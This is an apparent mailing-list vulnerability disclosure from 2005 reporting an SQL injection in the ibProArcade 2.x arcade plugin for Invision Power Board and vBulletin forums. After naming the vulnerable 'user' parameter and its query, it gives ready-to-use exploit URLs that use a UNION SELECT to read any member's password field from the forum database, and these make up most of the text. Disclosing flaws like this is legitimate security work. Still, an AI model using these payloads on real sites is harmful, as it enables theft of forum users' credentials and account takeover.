<<< Date Index >>>     <<< Thread Index >>>

Sql injection in ibProArcade



Sql injection in ibProArcade.
#############################

This bug was discoverd in all of the versions of ibproarcade 2.x.
It was tested and found perfectly working under vBulettin or Invision power 
board.
Date:2005-11-5

The injection is here:
module=report&user=[userid]
Query: 'SELECT name FROM ibf_members WHERE id=[userid]'

Exploit:
IPB:
index.php?act=Arcade&module=report&user=-1 union select password from 
ibf_members where id=[any_user]
vBulettin forums:
index.php?act=ibProArcade&module=report&user=-1 union select password from user 
where userid=[any_user]

Thankyou , B~HFH
bhfh01@xxxxxxxxx